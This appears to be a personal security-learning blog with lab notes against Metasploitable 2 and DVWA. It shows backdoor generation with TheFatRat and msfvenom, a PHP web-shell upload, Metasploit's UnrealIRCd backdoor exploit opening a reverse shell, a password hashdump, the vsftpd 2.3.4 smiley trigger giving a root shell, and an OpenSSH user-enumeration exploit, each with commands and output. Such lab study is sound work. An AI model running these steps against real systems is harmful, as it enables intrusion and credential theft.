Showing posts with label Security. Show all posts

Thursday, September 3, 2020

Encryption String

Decoder/Encoder Tool 

ASCII (Tool)

Base64 principle (Tool)

The characters in ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ are used as the encoded output, until all of the input data has been converted.


Monday, August 24, 2020

dirb

dirb http://192.168.92.129 

+ http://192.168.92.129/phpMyAdmin/sql (CODE:200|SIZE:4145)                                                                                                                    

==> DIRECTORY: http://192.168.92.129/phpMyAdmin/test/ 

Sunday, August 23, 2020

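Reverse shell backdoor program


Choose 1 -> generate a backdoor program with msfvenom


Generate the backdoor program test.sh

Plant the backdoor program

Look for places where a program can be executed

1. At boot?

2. When a particular program is run?

3. When a particular function is used?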


sudo msfconsole

Use the module: exploit/multi/handler


Run it

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.92.128:1234 

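Wait for the victim to run the backdoor program (first test on the local machine to see whether it works; the other machine must also be Kali)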

root@kali:~/Fatrat_Generated# ./test.sh 

./test.sh: redirection error: cannot duplicate fd: Bad file descriptor

./test.sh: line 1: 154: Bad file descriptor

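The attacker successfully establishes the reverse shell



Plant the backdoor program on 192.168.92.129

First generate a PHP backdoor program

port 9999



Once configured, generate test.php

Log in

http://192.168.92.129/dvwa/login.php (default username is 'admin' with password 'password')


Upload the backdoor program


Run http://192.168.92.129/dvwa/hackable/uploads/test.php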





Security Tools Index

Information Gathering

Vulnerability Analysis

Web Application Analysis

Web Security Attacks

Database Assessment

Password Attacks

Wireless Attacks

Reverse Engineering

Exploitation Tools

Backdoor

Sniffing & Spoofing

Post Exploitation

Forensics

Reporting Tools

Social Engineering Tools

Vulnerability datasource

SOC

Other

Blog

  https://githacktools.blogspot.com/

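  A Serious Matter of Information, Blocking Viruses Single-Handedly - Information Security Protection Explained Simply

  Computer forensics, data rescue, data recovery, malware

  [Day20] Virus introduction - getting to know the common types of file-infecting viruses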

  https://ithelp.ithome.com.tw/users/20103647/ironman/1126

  https://ithelp.ithome.com.tw/users/20103559/ironman

gitHub

  https://github.com/rapid7


Security courses

 Advanced persistent penetration

https://www.google.com/imgres?imgurl=https%3A%2F%2Fwww.corelan.be%2Fwp-content%2Fuploads%2F2010%2F08%2Fimage_thumb3.png&imgrefurl=https%3A%2F%2Fwww.b1ngda0.cn%2F2019%2F08%2F02%2FExploit%25E7%25BC%2596%25E5%2586%2599%25E6%2595%2599%25E7%25A8%258B%25E7%25AC%25AC%25E4%25B8%2580%25E9%2583%25A8%25E5%2588%2586%25EF%25BC%259A%25E5%259F%25BA%25E4%25BA%258E%25E6%25A0%2588%25E7%259A%2584%25E6%25BA%25A2%25E5%2587%25BA%2F&docid=Q5xzPI4PoHkf1M&tbnid=xNhka4azzefq5M&vet=1&w=588&h=677&itg=1&bih=629&biw=1366&ved=2ahUKEwjY-bCuubPrAhX2yYsBHWZUA6wQxiAoCHoECAEQLg&iact=c&ictx=1


Linux binary Exploitation - Basic knowledge

MacOS memory allocator (libmalloc) Exploitation - Chinese Version

Windows 10 Nt Heap Exploitation (Chinese version)

Tcache Exploitation

Linux Binary Exploitation - Stack buffer overflow

Backdoor-factory

 Backdoor antivirus-evasion tool - Backdoor-factory

Install TheFatRat

 Install

 sudo chmod +x setup.sh && sudo ./setup.sh 

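Check whether the backdoor tool package needs to be specified manually


Check whether missing packages need to be installed manually

Location: /home/kali/Desktop/class2/practice-14/the-backdoor-factory/backdoor.py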

cd TheFatRat
chmod +x chk_tools 
./chk_tools

Instalation completed , To execute fatrat write anywhere in your terminal (fatrat) 

root@kali:/home/kali/Desktop/class2/practice-14/TheFatRat# ./fatrat 

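 TheFatRat feature overview

• 01: Generate a backdoor program with msfvenom

• 02: Generate a backdoor program with Fudwin1.0

• 03: Generate a backdoor program with Avoid v1.2

• 04: Generate a backdoor program with backdoor-factory

• 05: Generate an APK backdoor program

• 06: Generate a backdoor program with PwnWinds

• 07: Generate Office-related backdoor programs

• 08: Generate Linux-related backdoor programs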

Backdoor

TheFatRat

Backdoor program

Attack port 6667 on Metasploitable 2

msf5 > db_nmap -sS -A 192.168.92.1/24

msf5 > search irc

msf5 > use exploit/unix/irc/unreal_ircd_3281_backdoor

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > info


       Name: UnrealIRCD 3.2.8.1 Backdoor Command Execution

     Module: exploit/unix/irc/unreal_ircd_3281_backdoor

   Platform: Unix

       Arch: cmd

 Privileged: No

    License: Metasploit Framework License (BSD)

       Rank: Excellent

  Disclosed: 2010-06-12

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOSTS 192.168.92.129
RHOSTS => 192.168.92.129
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  192.168.92.129   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   6667             yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > run

[*] Started reverse TCP double handler on 192.168.92.128:4444 
[*] 192.168.92.129:6667 - Connected to 192.168.92.129:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 192.168.92.129:6667 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo BCNTNmWzC7uENOcl;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "BCNTNmWzC7uENOcl\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.92.128:4444 -> 192.168.92.129:54096) at 2020-08-23 08:16:47 -0400

Keep the session

ctrl +z

Background session 1? [y/N]  y
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > sessions

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               192.168.92.128:4444 -> 192.168.92.129:54096 (192.168.92.129)

Use post/linux/gather/hashdump to collect the password files

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > back
msf5 > use post/linux/gather/hashdump

Use the already-established session




Connect to Metasploitable 2; TCP port 21 has a CVE vulnerability

 root@kali:/home/kali/Desktop/class2/practice-10# telnet 192.168.92.129 21

Trying 192.168.92.129...

Connected to 192.168.92.129.

Escape character is '^]'.

220 (vsFTPd 2.3.4)

user 1234:)

331 Please specify the password.

pass 12345

==============================================================

Check whether port 6200 has been opened

kali@kali:~$ sudo nmap -sS -p 6200 192.168.92.129

[sudo] password for kali: 

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-23 07:22 EDT

Nmap scan report for 192.168.92.129

Host is up (0.00028s latency).


PORT     STATE SERVICE

6200/tcp open  lm-x

MAC Address: 00:0C:29:D9:F1:65 (VMware)


Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds

kali@kali:~$ 

===============================================================
Log in through port 6200

kali@kali:~$ telnet 192.168.92.129 6200
Trying 192.168.92.129...
Connected to 192.168.92.129.
Escape character is '^]'.
id;
uid=0(root) gid=0(root)
: command not found
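
Seen from the defender's side, the session above leaves two observable events: an FTP `USER` argument containing `:)` and, shortly afterwards, a connection to TCP 6200 on the same server. The following detection sketch is an added example, not part of the original notes; the log format, the five-minute window and the function name `detect_vsftpd_backdoor` are assumptions, and the sample records are constructed.

```python
from datetime import datetime, timedelta

# Constructed sample records (not from the original post). Assumed format:
#   "<ISO time> FTP <client> <server> <command> <argument>"
#   "<ISO time> CONN <client> <server> <dst_port>"
SAMPLE_LOG = """\
2020-08-23T07:21:40 FTP 192.168.92.128 192.168.92.129 USER 1234:)
2020-08-23T07:21:44 FTP 192.168.92.128 192.168.92.129 PASS <redacted>
2020-08-23T07:22:10 CONN 192.168.92.128 192.168.92.129 6200
2020-08-23T07:30:00 FTP 192.168.92.50 192.168.92.129 USER alice
2020-08-23T07:30:05 CONN 192.168.92.50 192.168.92.129 22
2020-08-23T09:00:00 CONN 192.168.92.60 192.168.92.129 6200
"""

BACKDOOR_PORT = "6200"          # port seen open in the nmap output above
WINDOW = timedelta(minutes=5)   # assumed correlation window


def detect_vsftpd_backdoor(log_text, window=WINDOW):
    """Flag USER arguments containing ':)' and later connections to port 6200."""
    triggers = {}   # server -> times a ':)' USER command was seen
    findings = []
    for line in log_text.splitlines():
        parts = line.split(None, 5)
        if len(parts) < 5:
            continue
        ts = datetime.fromisoformat(parts[0])
        kind, client, server = parts[1], parts[2], parts[3]
        if kind == "FTP" and len(parts) == 6:
            if parts[4].upper() == "USER" and ":)" in parts[5]:
                triggers.setdefault(server, []).append(ts)
                findings.append(("trigger", client, server, ts))
        elif kind == "CONN" and parts[4] == BACKDOOR_PORT:
            # Any client may connect once the listener is up, so correlate on server.
            seen = any(timedelta(0) <= ts - t <= window
                       for t in triggers.get(server, []))
            kind_out = "shell-confirmed" if seen else "port-6200-only"
            findings.append((kind_out, client, server, ts))
    return findings


if __name__ == "__main__":
    for kind, client, server, ts in detect_vsftpd_backdoor(SAMPLE_LOG):
        print(f"{ts.isoformat()} {kind:16} client={client} server={server}")
```

A `trigger` finding on its own already means the FTP daemon should be checked against a clean vsftpd build; `port-6200-only` is lower confidence because other services can legitimately use that port.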


Look for insecure packages

Reveal the device's package versions

root@kali:/home/kali# nmap -sS -sV -p 22 192.168.92.129

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-23 05:35 EDT

Nmap scan report for 192.168.92.129

Host is up (0.00039s latency).


PORT   STATE SERVICE VERSION

22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)

MAC Address: 00:0C:29:D9:F1:65 (VMware)

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 0.90 seconds

Search for whether an insecure package is in use

https://www.cvedetails.com/cve/CVE-2018-15473/

Download a public exploit tool to carry out the attack

https://www.exploit-db.com/exploits/45233


python 45233.py 192.168.92.129 --port 22 --username root

python 45233.py 192.168.92.129 --port 22 --username root2

Vulnerability datasource

Current CVSS Score Distribution For All Vulnerabilities 

Load a new module

 root@kali:~/.msf4/modules# pwd

/root/.msf4/modules

root@kali:~/.msf4/modules# mkdir exploits

copy test_module.rb to exploits dir

root@kali:~/.msf4/modules/exploits# ls
test_module.rb


Start msfconsole

Reload the modules

reload_all

msf5 > reload_all
[*] Reloading modules from all module paths...
[!] The following modules were loaded with warnings:
[!]     /root/.msf4/modules/exploits/test_module.rb
[!] Please see /root/.msf4/logs/framework.log for details.


Friday, August 21, 2020

Exploiting a vulnerability with the msf tools

Kali Linux: 192.168.92.128

Metasploitable 2: 192.168.92.129


msf5 > search irc


msf5 > use exploit/unix/irc/unreal_ircd_3281_backdoor 

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > info //view module information

     Name: UnrealIRCD 3.2.8.1 Backdoor Command Execution

     Module: exploit/unix/irc/unreal_ircd_3281_backdoor

   Platform: Unix

       Arch: cmd

 Privileged: No

    License: Metasploit Framework License (BSD)

       Rank: Excellent

  Disclosed: 2010-06-12

msf5 > options



Begin the intrusion


Type ifconfig

Now on Metasploitable 2: 192.168.92.129


Tuesday, August 18, 2020

Collecting test data with the msf tools

Kali Linux: 192.168.92.128

Metasploitable 2: 192.168.92.129

Start the database

systemctl start postgresql

Re-initialize the database

sudo msfdb init

Start msfconsole and save the command history to iotclass1

sudo msfconsole -H iotclass1

Create a workspace named lab

msf5 > workspace -a lab

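[*] Added workspace: lab
[*] Workspace: lab

List the workspaces

msf5 > workspace
  default
* lab
msf5 >

Run a TCP SYN scan (-sS) against the devices on the local network; service type and version detection, operating system type and version detection, and script scanning are all covered by (-A)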

msf5 > db_nmap -sS 192.168.92.1/24

msf5 > hosts

msf5> services

msf5> back


